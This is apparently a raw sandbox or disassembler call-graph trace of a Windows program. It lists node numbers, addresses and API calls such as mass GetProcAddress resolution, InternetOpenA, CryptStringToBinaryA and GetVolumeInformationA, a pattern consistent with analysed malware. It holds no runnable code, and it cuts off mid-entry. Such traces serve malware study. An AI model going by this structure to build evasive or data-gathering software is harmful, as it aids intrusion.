13764->13765 13766 a55e93 13765->13766 14992 a50f40 13766->14992 13768 a55e9e 13769 a41590 lstrcpy 13768->13769 13770 a55eb5 13769->13770 14997 a51a10 13770->14997 13772 a55eba 13773 a5a740 lstrcpy 13772->13773 13774 a55ed6 13773->13774 15341 a44fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13774->15341 13776 a55edb 13777 a41590 lstrcpy 13776->13777 13778 a55f5b 13777->13778 15348 a50740 13778->15348 13780 a55f60 13781 a5a740 lstrcpy 13780->13781 13782 a55f86 13781->13782 13783 a41590 lstrcpy 13782->13783 13784 a55f9a 13783->13784 13785 a45960 34 API calls 13784->13785 13880 a445d1 RtlAllocateHeap 13879->13880 13883 a44621 VirtualProtect 13880->13883 13883->13528 13884->13615 13886 a410c2 codecvt 13885->13886 13887 a410fd 13886->13887 13888 a410e2 VirtualFree 13886->13888 13887->13645 13888->13887 13890 a41233 GlobalMemoryStatusEx 13889->13890 13890->13648 13891->13672 13893 a5a7c2 13892->13893 13894 a5a7ec 13893->13894 13895 a5a7da lstrcpy 13893->13895 13894->13677 13895->13894 13897 a5a740 lstrcpy 13896->13897 13898 a56833 13897->13898 13899 a5a9b0 4 API calls 13898->13899 13900 a56845 13899->13900 13901 a5a8a0 lstrcpy 13900->13901 13902 a5684e 13901->13902 13903 a5a9b0 4 API calls 13902->13903 13904 a56867 13903->13904 13905 a5a8a0 lstrcpy 13904->13905 13906 a56870 13905->13906 13907 a5a9b0 4 API calls 13906->13907 13908 a5688a 13907->13908 13909 a5a8a0 lstrcpy 13908->13909 13910 a56893 13909->13910 13911 a5a9b0 4 API calls 13910->13911 13912 a568ac 13911->13912 13913 a5a8a0 lstrcpy 13912->13913 13914 a568b5 13913->13914 13915 a5a9b0 4 API calls 13914->13915 13916 a568cf 13915->13916 13917 a5a8a0 lstrcpy 13916->13917 13918 a568d8 13917->13918 13919 a5a9b0 4 API calls 13918->13919 13920 a568f3 13919->13920 13921 a5a8a0 lstrcpy 13920->13921 13922 a568fc 13921->13922 13923 a5a7a0 lstrcpy 13922->13923 13924 a56910 13923->13924 13924->13684 13926 a5a812 13925->13926 13926->13687 13928 a5a83f 13927->13928 13929 a55b54 13928->13929 13930 a5a87b lstrcpy 13928->13930 13929->13697 13930->13929 13932 a5a8a0 lstrcpy 13931->13932 13933 a56443 13932->13933 13934 a5a8a0 lstrcpy 13933->13934 13935 a56455 13934->13935 13936 a5a8a0 lstrcpy 13935->13936 13937 a56467 13936->13937 13938 a5a8a0 lstrcpy 13937->13938 13939 a55b86 13938->13939 13939->13703 13941 a445c0 2 API calls 13940->13941 13942 a426b4 13941->13942 13943 a445c0 2 API calls 13942->13943 13944 a426d7 13943->13944 13945 a445c0 2 API calls 13944->13945 13946 a426f0 13945->13946 13947 a445c0 2 API calls 13946->13947 13948 a42709 13947->13948 13949 a445c0 2 API calls 13948->13949 13950 a42736 13949->13950 13951 a445c0 2 API calls 13950->13951 13952 a4274f 13951->13952 13953 a445c0 2 API calls 13952->13953 13954 a42768 13953->13954 13955 a445c0 2 API calls 13954->13955 13956 a42795 13955->13956 13957 a445c0 2 API calls 13956->13957 13958 a427ae 13957->13958 13959 a445c0 2 API calls 13958->13959 13960 a427c7 13959->13960 13961 a445c0 2 API calls 13960->13961 13962 a427e0 13961->13962 13963 a445c0 2 API calls 13962->13963 13964 a427f9 13963->13964 13965 a445c0 2 API calls 13964->13965 13966 a42812 13965->13966 13967 a445c0 2 API calls 13966->13967 13968 a4282b 13967->13968 13969 a445c0 2 API calls 13968->13969 13970 a42844 13969->13970 13971 a445c0 2 API calls 13970->13971 13972 a4285d 13971->13972 13973 a445c0 2 API calls 13972->13973 13974 a42876 13973->13974 13975 a445c0 2 API calls 13974->13975 13976 a4288f 13975->13976 13977 a445c0 2 API calls 13976->13977 13978 a428a8 13977->13978 13979 a445c0 2 API calls 13978->13979 13980 a428c1 13979->13980 13981 a445c0 2 API calls 13980->13981 13982 a428da 13981->13982 13983 a445c0 2 API calls 13982->13983 13984 a428f3 13983->13984 13985 a445c0 2 API calls 13984->13985 13986 a4290c 13985->13986 13987 a445c0 2 API calls 13986->13987 13988 a42925 13987->13988 13989 a445c0 2 API calls 13988->13989 13990 a4293e 13989->13990 13991 a445c0 2 API calls 13990->13991 13992 a42957 13991->13992 13993 a445c0 2 API calls 13992->13993 13994 a42970 13993->13994 13995 a445c0 2 API calls 13994->13995 13996 a42989 13995->13996 13997 a445c0 2 API calls 13996->13997 13998 a429a2 13997->13998 13999 a445c0 2 API calls 13998->13999 14000 a429bb 13999->14000 14001 a445c0 2 API calls 14000->14001 14002 a429d4 14001->14002 14003 a445c0 2 API calls 14002->14003 14004 a429ed 14003->14004 14005 a445c0 2 API calls 14004->14005 14006 a42a06 14005->14006 14007 a445c0 2 API calls 14006->14007 14008 a42a1f 14007->14008 14009 a445c0 2 API calls 14008->14009 14010 a42a38 14009->14010 14011 a445c0 2 API calls 14010->14011 14012 a42a51 14011->14012 14013 a445c0 2 API calls 14012->14013 14014 a42a6a 14013->14014 14015 a445c0 2 API calls 14014->14015 14016 a42a83 14015->14016 14017 a445c0 2 API calls 14016->14017 14018 a42a9c 14017->14018 14019 a445c0 2 API calls 14018->14019 14020 a42ab5 14019->14020 14021 a445c0 2 API calls 14020->14021 14022 a42ace 14021->14022 14023 a445c0 2 API calls 14022->14023 14024 a42ae7 14023->14024 14025 a445c0 2 API calls 14024->14025 14026 a42b00 14025->14026 14027 a445c0 2 API calls 14026->14027 14028 a42b19 14027->14028 14029 a445c0 2 API calls 14028->14029 14030 a42b32 14029->14030 14031 a445c0 2 API calls 14030->14031 14032 a42b4b 14031->14032 14033 a445c0 2 API calls 14032->14033 14034 a42b64 14033->14034 14035 a445c0 2 API calls 14034->14035 14036 a42b7d 14035->14036 14037 a445c0 2 API calls 14036->14037 14038 a42b96 14037->14038 14039 a445c0 2 API calls 14038->14039 14040 a42baf 14039->14040 14041 a445c0 2 API calls 14040->14041 14042 a42bc8 14041->14042 14043 a445c0 2 API calls 14042->14043 14044 a42be1 14043->14044 14045 a445c0 2 API calls 14044->14045 14046 a42bfa 14045->14046 14047 a445c0 2 API calls 14046->14047 14048 a42c13 14047->14048 14049 a445c0 2 API calls 14048->14049 14050 a42c2c 14049->14050 14051 a445c0 2 API calls 14050->14051 14052 a42c45 14051->14052 14053 a445c0 2 API calls 14052->14053 14054 a42c5e 14053->14054 14055 a445c0 2 API calls 14054->14055 14056 a42c77 14055->14056 14057 a445c0 2 API calls 14056->14057 14058 a42c90 14057->14058 14059 a445c0 2 API calls 14058->14059 14060 a42ca9 14059->14060 14061 a445c0 2 API calls 14060->14061 14062 a42cc2 14061->14062 14063 a445c0 2 API calls 14062->14063 14064 a42cdb 14063->14064 14065 a445c0 2 API calls 14064->14065 14066 a42cf4 14065->14066 14067 a445c0 2 API calls 14066->14067 14068 a42d0d 14067->14068 14069 a445c0 2 API calls 14068->14069 14070 a42d26 14069->14070 14071 a445c0 2 API calls 14070->14071 14072 a42d3f 14071->14072 14073 a445c0 2 API calls 14072->14073 14074 a42d58 14073->14074 14075 a445c0 2 API calls 14074->14075 14076 a42d71 14075->14076 14077 a445c0 2 API calls 14076->14077 14078 a42d8a 14077->14078 14079 a445c0 2 API calls 14078->14079 14080 a42da3 14079->14080 14081 a445c0 2 API calls 14080->14081 14082 a42dbc 14081->14082 14083 a445c0 2 API calls 14082->14083 14084 a42dd5 14083->14084 14085 a445c0 2 API calls 14084->14085 14086 a42dee 14085->14086 14087 a445c0 2 API calls 14086->14087 14088 a42e07 14087->14088 14089 a445c0 2 API calls 14088->14089 14090 a42e20 14089->14090 14091 a445c0 2 API calls 14090->14091 14092 a42e39 14091->14092 14093 a445c0 2 API calls 14092->14093 14094 a42e52 14093->14094 14095 a445c0 2 API calls 14094->14095 14096 a42e6b 14095->14096 14097 a445c0 2 API calls 14096->14097 14098 a42e84 14097->14098 14099 a445c0 2 API calls 14098->14099 14100 a42e9d 14099->14100 14101 a445c0 2 API calls 14100->14101 14102 a42eb6 14101->14102 14103 a445c0 2 API calls 14102->14103 14104 a42ecf 14103->14104 14105 a445c0 2 API calls 14104->14105 14106 a42ee8 14105->14106 14107 a445c0 2 API calls 14106->14107 14108 a42f01 14107->14108 14109 a445c0 2 API calls 14108->14109 14110 a42f1a 14109->14110 14111 a445c0 2 API calls 14110->14111 14112 a42f33 14111->14112 14113 a445c0 2 API calls 14112->14113 14114 a42f4c 14113->14114 14115 a445c0 2 API calls 14114->14115 14116 a42f65 14115->14116 14117 a445c0 2 API calls 14116->14117 14118 a42f7e 14117->14118 14119 a445c0 2 API calls 14118->14119 14120 a42f97 14119->14120 14121 a445c0 2 API calls 14120->14121 14122 a42fb0 14121->14122 14123 a445c0 2 API calls 14122->14123 14124 a42fc9 14123->14124 14125 a445c0 2 API calls 14124->14125 14126 a42fe2 14125->14126 14127 a445c0 2 API calls 14126->14127 14128 a42ffb 14127->14128 14129 a445c0 2 API calls 14128->14129 14130 a43014 14129->14130 14131 a445c0 2 API calls 14130->14131 14132 a4302d 14131->14132 14133 a445c0 2 API calls 14132->14133 14134 a43046 14133->14134 14135 a445c0 2 API calls 14134->14135 14136 a4305f 14135->14136 14137 a445c0 2 API calls 14136->14137 14138 a43078 14137->14138 14139 a445c0 2 API calls 14138->14139 14140 a43091 14139->14140 14141 a445c0 2 API calls 14140->14141 14142 a430aa 14141->14142 14143 a445c0 2 API calls 14142->14143 14144 a430c3 14143->14144 14145 a445c0 2 API calls 14144->14145 14146 a430dc 14145->14146 14147 a445c0 2 API calls 14146->14147 14148 a430f5 14147->14148 14149 a445c0 2 API calls 14148->14149 14150 a4310e 14149->14150 14151 a445c0 2 API calls 14150->14151 14152 a43127 14151->14152 14153 a445c0 2 API calls 14152->14153 14154 a43140 14153->14154 14155 a445c0 2 API calls 14154->14155 14156 a43159 14155->14156 14157 a445c0 2 API calls 14156->14157 14158 a43172 14157->14158 14159 a445c0 2 API calls 14158->14159 14160 a4318b 14159->14160 14161 a445c0 2 API calls 14160->14161 14162 a431a4 14161->14162 14163 a445c0 2 API calls 14162->14163 14164 a431bd 14163->14164 14165 a445c0 2 API calls 14164->14165 14166 a431d6 14165->14166 14167 a445c0 2 API calls 14166->14167 14168 a431ef 14167->14168 14169 a445c0 2 API calls 14168->14169 14170 a43208 14169->14170 14171 a445c0 2 API calls 14170->14171 14172 a43221 14171->14172 14173 a445c0 2 API calls 14172->14173 14174 a4323a 14173->14174 14175 a445c0 2 API calls 14174->14175 14176 a43253 14175->14176 14177 a445c0 2 API calls 14176->14177 14178 a4326c 14177->14178 14179 a445c0 2 API calls 14178->14179 14180 a43285 14179->14180 14181 a445c0 2 API calls 14180->14181 14182 a4329e 14181->14182 14183 a445c0 2 API calls 14182->14183 14184 a432b7 14183->14184 14185 a445c0 2 API calls 14184->14185 14186 a432d0 14185->14186 14187 a445c0 2 API calls 14186->14187 14188 a432e9 14187->14188 14189 a445c0 2 API calls 14188->14189 14190 a43302 14189->14190 14191 a445c0 2 API calls 14190->14191 14192 a4331b 14191->14192 14193 a445c0 2 API calls 14192->14193 14194 a43334 14193->14194 14195 a445c0 2 API calls 14194->14195 14196 a4334d 14195->14196 14197 a445c0 2 API calls 14196->14197 14198 a43366 14197->14198 14199 a445c0 2 API calls 14198->14199 14200 a4337f 14199->14200 14201 a445c0 2 API calls 14200->14201 14202 a43398 14201->14202 14203 a445c0 2 API calls 14202->14203 14204 a433b1 14203->14204 14205 a445c0 2 API calls 14204->14205 14206 a433ca 14205->14206 14207 a445c0 2 API calls 14206->14207 14208 a433e3 14207->14208 14209 a445c0 2 API calls 14208->14209 14210 a433fc 14209->14210 14211 a445c0 2 API calls 14210->14211 14212 a43415 14211->14212 14213 a445c0 2 API calls 14212->14213 14214 a4342e 14213->14214 14215 a445c0 2 API calls 14214->14215 14216 a43447 14215->14216 14217 a445c0 2 API calls 14216->14217 14218 a43460 14217->14218 14219 a445c0 2 API calls 14218->14219 14220 a43479 14219->14220 14221 a445c0 2 API calls 14220->14221 14222 a43492 14221->14222 14223 a445c0 2 API calls 14222->14223 14224 a434ab 14223->14224 14225 a445c0 2 API calls 14224->14225 14226 a434c4 14225->14226 14227 a445c0 2 API calls 14226->14227 14228 a434dd 14227->14228 14229 a445c0 2 API calls 14228->14229 14230 a434f6 14229->14230 14231 a445c0 2 API calls 14230->14231 14232 a4350f 14231->14232 14233 a445c0 2 API calls 14232->14233 14234 a43528 14233->14234 14235 a445c0 2 API calls 14234->14235 14236 a43541 14235->14236 14237 a445c0 2 API calls 14236->14237 14238 a4355a 14237->14238 14239 a445c0 2 API calls 14238->14239 14240 a43573 14239->14240 14241 a445c0 2 API calls 14240->14241 14242 a4358c 14241->14242 14243 a445c0 2 API calls 14242->14243 14244 a435a5 14243->14244 14245 a445c0 2 API calls 14244->14245 14246 a435be 14245->14246 14247 a445c0 2 API calls 14246->14247 14248 a435d7 14247->14248 14249 a445c0 2 API calls 14248->14249 14250 a435f0 14249->14250 14251 a445c0 2 API calls 14250->14251 14252 a43609 14251->14252 14253 a445c0 2 API calls 14252->14253 14254 a43622 14253->14254 14255 a445c0 2 API calls 14254->14255 14256 a4363b 14255->14256 14257 a445c0 2 API calls 14256->14257 14258 a43654 14257->14258 14259 a445c0 2 API calls 14258->14259 14260 a4366d 14259->14260 14261 a445c0 2 API calls 14260->14261 14262 a43686 14261->14262 14263 a445c0 2 API calls 14262->14263 14264 a4369f 14263->14264 14265 a445c0 2 API calls 14264->14265 14266 a436b8 14265->14266 14267 a445c0 2 API calls 14266->14267 14268 a436d1 14267->14268 14269 a445c0 2 API calls 14268->14269 14270 a436ea 14269->14270 14271 a445c0 2 API calls 14270->14271 14272 a43703 14271->14272 14273 a445c0 2 API calls 14272->14273 14274 a4371c 14273->14274 14275 a445c0 2 API calls 14274->14275 14276 a43735 14275->14276 14277 a445c0 2 API calls 14276->14277 14278 a4374e 14277->14278 14279 a445c0 2 API calls 14278->14279 14280 a43767 14279->14280 14281 a445c0 2 API calls 14280->14281 14282 a43780 14281->14282 14283 a445c0 2 API calls 14282->14283 14284 a43799 14283->14284 14285 a445c0 2 API calls 14284->14285 14286 a437b2 14285->14286 14287 a445c0 2 API calls 14286->14287 14288 a437cb 14287->14288 14289 a445c0 2 API calls 14288->14289 14290 a437e4 14289->14290 14291 a445c0 2 API calls 14290->14291 14292 a437fd 14291->14292 14293 a445c0 2 API calls 14292->14293 14294 a43816 14293->14294 14295 a445c0 2 API calls 14294->14295 14296 a4382f 14295->14296 14297 a445c0 2 API calls 14296->14297 14298 a43848 14297->14298 14299 a445c0 2 API calls 14298->14299 14300 a43861 14299->14300 14301 a445c0 2 API calls 14300->14301 14302 a4387a 14301->14302 14303 a445c0 2 API calls 14302->14303 14304 a43893 14303->14304 14305 a445c0 2 API calls 14304->14305 14306 a438ac 14305->14306 14307 a445c0 2 API calls 14306->14307 14308 a438c5 14307->14308 14309 a445c0 2 API calls 14308->14309 14310 a438de 14309->14310 14311 a445c0 2 API calls 14310->14311 14312 a438f7 14311->14312 14313 a445c0 2 API calls 14312->14313 14314 a43910 14313->14314 14315 a445c0 2 API calls 14314->14315 14316 a43929 14315->14316 14317 a445c0 2 API calls 14316->14317 14318 a43942 14317->14318 14319 a445c0 2 API calls 14318->14319 14320 a4395b 14319->14320 14321 a445c0 2 API calls 14320->14321 14322 a43974 14321->14322 14323 a445c0 2 API calls 14322->14323 14324 a4398d 14323->14324 14325 a445c0 2 API calls 14324->14325 14326 a439a6 14325->14326 14327 a445c0 2 API calls 14326->14327 14328 a439bf 14327->14328 14329 a445c0 2 API calls 14328->14329 14330 a439d8 14329->14330 14331 a445c0 2 API calls 14330->14331 14332 a439f1 14331->14332 14333 a445c0 2 API calls 14332->14333 14334 a43a0a 14333->14334 14335 a445c0 2 API calls 14334->14335 14336 a43a23 14335->14336 14337 a445c0 2 API calls 14336->14337 14338 a43a3c 14337->14338 14339 a445c0 2 API calls 14338->14339 14340 a43a55 14339->14340 14341 a445c0 2 API calls 14340->14341 14342 a43a6e 14341->14342 14343 a445c0 2 API calls 14342->14343 14344 a43a87 14343->14344 14345 a445c0 2 API calls 14344->14345 14346 a43aa0 14345->14346 14347 a445c0 2 API calls 14346->14347 14348 a43ab9 14347->14348 14349 a445c0 2 API calls 14348->14349 14350 a43ad2 14349->14350 14351 a445c0 2 API calls 14350->14351 14352 a43aeb 14351->14352 14353 a445c0 2 API calls 14352->14353 14354 a43b04 14353->14354 14355 a445c0 2 API calls 14354->14355 14356 a43b1d 14355->14356 14357 a445c0 2 API calls 14356->14357 14358 a43b36 14357->14358 14359 a445c0 2 API calls 14358->14359 14360 a43b4f 14359->14360 14361 a445c0 2 API calls 14360->14361 14362 a43b68 14361->14362 14363 a445c0 2 API calls 14362->14363 14364 a43b81 14363->14364 14365 a445c0 2 API calls 14364->14365 14366 a43b9a 14365->14366 14367 a445c0 2 API calls 14366->14367 14368 a43bb3 14367->14368 14369 a445c0 2 API calls 14368->14369 14370 a43bcc 14369->14370 14371 a445c0 2 API calls 14370->14371 14372 a43be5 14371->14372 14373 a445c0 2 API calls 14372->14373 14374 a43bfe 14373->14374 14375 a445c0 2 API calls 14374->14375 14376 a43c17 14375->14376 14377 a445c0 2 API calls 14376->14377 14378 a43c30 14377->14378 14379 a445c0 2 API calls 14378->14379 14380 a43c49 14379->14380 14381 a445c0 2 API calls 14380->14381 14382 a43c62 14381->14382 14383 a445c0 2 API calls 14382->14383 14384 a43c7b 14383->14384 14385 a445c0 2 API calls 14384->14385 14386 a43c94 14385->14386 14387 a445c0 2 API calls 14386->14387 14388 a43cad 14387->14388 14389 a445c0 2 API calls 14388->14389 14390 a43cc6 14389->14390 14391 a445c0 2 API calls 14390->14391 14392 a43cdf 14391->14392 14393 a445c0 2 API calls 14392->14393 14394 a43cf8 14393->14394 14395 a445c0 2 API calls 14394->14395 14396 a43d11 14395->14396 14397 a445c0 2 API calls 14396->14397 14398 a43d2a 14397->14398 14399 a445c0 2 API calls 14398->14399 14400 a43d43 14399->14400 14401 a445c0 2 API calls 14400->14401 14402 a43d5c 14401->14402 14403 a445c0 2 API calls 14402->14403 14404 a43d75 14403->14404 14405 a445c0 2 API calls 14404->14405 14406 a43d8e 14405->14406 14407 a445c0 2 API calls 14406->14407 14408 a43da7 14407->14408 14409 a445c0 2 API calls 14408->14409 14410 a43dc0 14409->14410 14411 a445c0 2 API calls 14410->14411 14412 a43dd9 14411->14412 14413 a445c0 2 API calls 14412->14413 14414 a43df2 14413->14414 14415 a445c0 2 API calls 14414->14415 14416 a43e0b 14415->14416 14417 a445c0 2 API calls 14416->14417 14418 a43e24 14417->14418 14419 a445c0 2 API calls 14418->14419 14420 a43e3d 14419->14420 14421 a445c0 2 API calls 14420->14421 14422 a43e56 14421->14422 14423 a445c0 2 API calls 14422->14423 14424 a43e6f 14423->14424 14425 a445c0 2 API calls 14424->14425 14426 a43e88 14425->14426 14427 a445c0 2 API calls 14426->14427 14428 a43ea1 14427->14428 14429 a445c0 2 API calls 14428->14429 14430 a43eba 14429->14430 14431 a445c0 2 API calls 14430->14431 14432 a43ed3 14431->14432 14433 a445c0 2 API calls 14432->14433 14434 a43eec 14433->14434 14435 a445c0 2 API calls 14434->14435 14436 a43f05 14435->14436 14437 a445c0 2 API calls 14436->14437 14438 a43f1e 14437->14438 14439 a445c0 2 API calls 14438->14439 14440 a43f37 14439->14440 14441 a445c0 2 API calls 14440->14441 14442 a43f50 14441->14442 14443 a445c0 2 API calls 14442->14443 14444 a43f69 14443->14444 14445 a445c0 2 API calls 14444->14445 14446 a43f82 14445->14446 14447 a445c0 2 API calls 14446->14447 14448 a43f9b 14447->14448 14449 a445c0 2 API calls 14448->14449 14450 a43fb4 14449->14450 14451 a445c0 2 API calls 14450->14451 14452 a43fcd 14451->14452 14453 a445c0 2 API calls 14452->14453 14454 a43fe6 14453->14454 14455 a445c0 2 API calls 14454->14455 14456 a43fff 14455->14456 14457 a445c0 2 API calls 14456->14457 14458 a44018 14457->14458 14459 a445c0 2 API calls 14458->14459 14460 a44031 14459->14460 14461 a445c0 2 API calls 14460->14461 14462 a4404a 14461->14462 14463 a445c0 2 API calls 14462->14463 14464 a44063 14463->14464 14465 a445c0 2 API calls 14464->14465 14466 a4407c 14465->14466 14467 a445c0 2 API calls 14466->14467 14468 a44095 14467->14468 14469 a445c0 2 API calls 14468->14469 14470 a440ae 14469->14470 14471 a445c0 2 API calls 14470->14471 14472 a440c7 14471->14472 14473 a445c0 2 API calls 14472->14473 14474 a440e0 14473->14474 14475 a445c0 2 API calls 14474->14475 14476 a440f9 14475->14476 14477 a445c0 2 API calls 14476->14477 14478 a44112 14477->14478 14479 a445c0 2 API calls 14478->14479 14480 a4412b 14479->14480 14481 a445c0 2 API calls 14480->14481 14482 a44144 14481->14482 14483 a445c0 2 API calls 14482->14483 14484 a4415d 14483->14484 14485 a445c0 2 API calls 14484->14485 14486 a44176 14485->14486 14487 a445c0 2 API calls 14486->14487 14488 a4418f 14487->14488 14489 a445c0 2 API calls 14488->14489 14490 a441a8 14489->14490 14491 a445c0 2 API calls 14490->14491 14492 a441c1 14491->14492 14493 a445c0 2 API calls 14492->14493 14494 a441da 14493->14494 14495 a445c0 2 API calls 14494->14495 14496 a441f3 14495->14496 14497 a445c0 2 API calls 14496->14497 14498 a4420c 14497->14498 14499 a445c0 2 API calls 14498->14499 14500 a44225 14499->14500 14501 a445c0 2 API calls 14500->14501 14502 a4423e 14501->14502 14503 a445c0 2 API calls 14502->14503 14504 a44257 14503->14504 14505 a445c0 2 API calls 14504->14505 14506 a44270 14505->14506 14507 a445c0 2 API calls 14506->14507 14508 a44289 14507->14508 14509 a445c0 2 API calls 14508->14509 14510 a442a2 14509->14510 14511 a445c0 2 API calls 14510->14511 14512 a442bb 14511->14512 14513 a445c0 2 API calls 14512->14513 14514 a442d4 14513->14514 14515 a445c0 2 API calls 14514->14515 14516 a442ed 14515->14516 14517 a445c0 2 API calls 14516->14517 14518 a44306 14517->14518 14519 a445c0 2 API calls 14518->14519 14520 a4431f 14519->14520 14521 a445c0 2 API calls 14520->14521 14522 a44338 14521->14522 14523 a445c0 2 API calls 14522->14523 14524 a44351 14523->14524 14525 a445c0 2 API calls 14524->14525 14526 a4436a 14525->14526 14527 a445c0 2 API calls 14526->14527 14528 a44383 14527->14528 14529 a445c0 2 API calls 14528->14529 14530 a4439c 14529->14530 14531 a445c0 2 API calls 14530->14531 14532 a443b5 14531->14532 14533 a445c0 2 API calls 14532->14533 14534 a443ce 14533->14534 14535 a445c0 2 API calls 14534->14535 14536 a443e7 14535->14536 14537 a445c0 2 API calls 14536->14537 14538 a44400 14537->14538 14539 a445c0 2 API calls 14538->14539 14540 a44419 14539->14540 14541 a445c0 2 API calls 14540->14541 14542 a44432 14541->14542 14543 a445c0 2 API calls 14542->14543 14544 a4444b 14543->14544 14545 a445c0 2 API calls 14544->14545 14546 a44464 14545->14546 14547 a445c0 2 API calls 14546->14547 14548 a4447d 14547->14548 14549 a445c0 2 API calls 14548->14549 14550 a44496 14549->14550 14551 a445c0 2 API calls 14550->14551 14552 a444af 14551->14552 14553 a445c0 2 API calls 14552->14553 14554 a444c8 14553->14554 14555 a445c0 2 API calls 14554->14555 14556 a444e1 14555->14556 14557 a445c0 2 API calls 14556->14557 14558 a444fa 14557->14558 14559 a445c0 2 API calls 14558->14559 14560 a44513 14559->14560 14561 a445c0 2 API calls 14560->14561 14562 a4452c 14561->14562 14563 a445c0 2 API calls 14562->14563 14564 a44545 14563->14564 14565 a445c0 2 API calls 14564->14565 14566 a4455e 14565->14566 14567 a445c0 2 API calls 14566->14567 14568 a44577 14567->14568 14569 a445c0 2 API calls 14568->14569 14570 a44590 14569->14570 14571 a445c0 2 API calls 14570->14571 14572 a445a9 14571->14572 14573 a59c10 14572->14573 14574 a5a036 8 API calls 14573->14574 14575 a59c20 43 API calls 14573->14575 14576 a5a146 14574->14576 14577 a5a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14574->14577 14575->14574 14578 a5a216 14576->14578 14579 a5a153 8 API calls 14576->14579 14577->14576 14580 a5a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14578->14580 14581 a5a298 14578->14581 14579->14578 14580->14581 14582 a5a2a5 6 API calls 14581->14582 14583 a5a337 14581->14583 14582->14583 14584 a5a344 9 API calls 14583->14584 14585 a5a41f 14583->14585 14584->14585 14586 a5a4a2 14585->14586 14587 a5a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14585->14587 14588 a5a4dc 14586->14588 14589 a5a4ab GetProcAddress GetProcAddress 14586->14589 14587->14586 14590 a5a515 14588->14590 14591 a5a4e5 GetProcAddress GetProcAddress 14588->14591 14589->14588 14592 a5a612 14590->14592 14593 a5a522 10 API calls 14590->14593 14591->14590 14594 a5a67d 14592->14594 14595 a5a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14595 14593->14592 14596 a5a686 GetProcAddress 14594->14596 14597 a5a69e 14594->14597 14595->14594 14596->14597 14598 a5a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14597->14598 14599 a55ca3 14597->14599 14598->14599 14600 a41590 14599->14600 15721 a41670 14600->15721 14603 a5a7a0 lstrcpy 14604 a415b5 14603->14604 14605 a5a7a0 lstrcpy 14604->14605 14606 a415c7 14605->14606 14607 a5a7a0 lstrcpy 14606->14607 14608 a415d9 14607->14608 14609 a5a7a0 lstrcpy 14608->14609 14610 a41663 14609->14610 14611 a55510 14610->14611 14612 a55521 14611->14612 14613 a5a820 2 API calls 14612->14613 14614 a5552e 14613->14614 14615 a5a820 2 API calls 14614->14615 14616 a5553b 14615->14616 14617 a5a820 2 API calls 14616->14617 14618 a55548 14617->14618 14619 a5a740 lstrcpy 14618->14619 14620 a55555 14619->14620 14621 a5a740 lstrcpy 14620->14621 14622 a55562 14621->14622 14623 a5a740 lstrcpy 14622->14623 14624 a5556f 14623->14624 14625 a5a740 lstrcpy 14624->14625 14663 a5557c 14625->14663 14626 a55643 StrCmpCA 14626->14663 14627 a556a0 StrCmpCA 14628 a557dc 14627->14628 14627->14663 14629 a5a8a0 lstrcpy 14628->14629 14630 a557e8 14629->14630 14631 a5a820 2 API calls 14630->14631 14633 a557f6 14631->14633 14632 a5a820 lstrlen lstrcpy 14632->14663 14635 a5a820 2 API calls 14633->14635 14634 a55856 StrCmpCA 14636 a55991 14634->14636 14634->14663 14641 a55805 14635->14641 14640 a5a8a0 lstrcpy 14636->14640 14637 a5a740 lstrcpy 14637->14663 14638 a5a7a0 lstrcpy 14638->14663 14639 a5a8a0 lstrcpy 14639->14663 14642 a5599d 14640->14642 14643 a41670 lstrcpy 14641->14643 14645 a5a820 2 API calls 14642->14645 14665 a55811 14643->14665 14644 a41590 lstrcpy 14644->14663 14646 a559ab 14645->14646 14649 a5a820 2 API calls 14646->14649 14647 a55a0b StrCmpCA 14650 a55a16 Sleep 14647->14650 14651 a55a28 14647->14651 14648 a552c0 25 API calls 14648->14663 14652 a559ba 14649->14652 14650->14663 14653 a5a8a0 lstrcpy 14651->14653 14654 a41670 lstrcpy 14652->14654 14655 a55a34 14653->14655 14654->14665 14656 a5a820 2 API calls 14655->14656 14657 a55a43 14656->14657 14658 a5a820 2 API calls 14657->14658 14659 a55a52 14658->14659 14661 a41670 lstrcpy 14659->14661 14660 a5578a StrCmpCA 14660->14663 14661->14665 14662 a5593f StrCmpCA 14662->14663 14663->14626 14663->14627 14663->14632 14663->14634 14663->14637 14663->14638 14663->14639 14663->14644 14663->14647 14663->14648 14663->14660 14663->14662 14664 a551f0 20 API calls 14663->14664 14664->14663 14665->13718 14667 a57553 GetVolumeInformationA 14666->14667 14668 a5754c 14666->14668 14669 a57591 14667->14669 14668->14667 14670 a575fc GetProcessHeap RtlAllocateHeap 14669->14670 14671 a57619 14670->14671 14672 a57628 wsprintfA 14670->14672 14673 a5a740 lstrcpy 14671->14673 14674 a5a740 lstrcpy 14672->14674 14675 a55da7 14673->14675 14674->14675 14675->13739 14677 a5a7a0 lstrcpy 14676->14677 14678 a44899 14677->14678 15730 a447b0 14678->15730 14680 a448a5 14681 a5a740 lstrcpy 14680->14681 14682 a448d7 14681->14682 14683 a5a740 lstrcpy 14682->14683 14684 a448e4 14683->14684 14685 a5a740 lstrcpy 14684->14685 14686 a448f1 14685->14686 14687 a5a740 lstrcpy 14686->14687 14688 a448fe 14687->14688 14689 a5a740 lstrcpy 14688->14689 14690 a4490b InternetOpenA StrCmpCA 14689->14690 14691 a44944 14690->14691 14692 a44ecb InternetCloseHandle 14691->14692 15736 a58b60 14691->15736 14693 a44ee8 14692->14693 15751 a49ac0 CryptStringToBinaryA 14693->15751 14695 a44963 15744 a5a920 14695->15744 14698 a44976 14700 a5a8a0 lstrcpy 14698->14700 14705 a4497f 14700->14705 14701 a5a820 2 API calls 14702 a44f05 14701->14702 14703 a5a9b0 4 API calls 14702->14703 14706 a44f1b 14703->14706 14704 a44f27 codecvt 14707 a5a7a0 lstrcpy 14704->14707 14709 a5a9b0 4 API calls 14705->14709 14708 a5a8a0 lstrcpy 14706->14708 14720 a44f57 14707->14720 14708->14704 14710 a449a9 14709->14710 14711 a5a8a0 lstrcpy 14710->14711 14712 a449b2 14711->14712 14713 a5a9b0 4 API calls 14712->14713 14714 a449d1 14713->14714 14715 a5a8a0 lstrcpy 14714->14715 14716 a449da 14715->14716 14717 a5a920 3 API calls 14716->14717 14718 a449f8 14717->14718 14719 a5a8a0 lstrcpy 14718->14719 14721 a44a01 14719->14721 14720->13742 14722 a5a9b0 4 API calls 14721->14722 14723 a44a20 14722->14723 14724 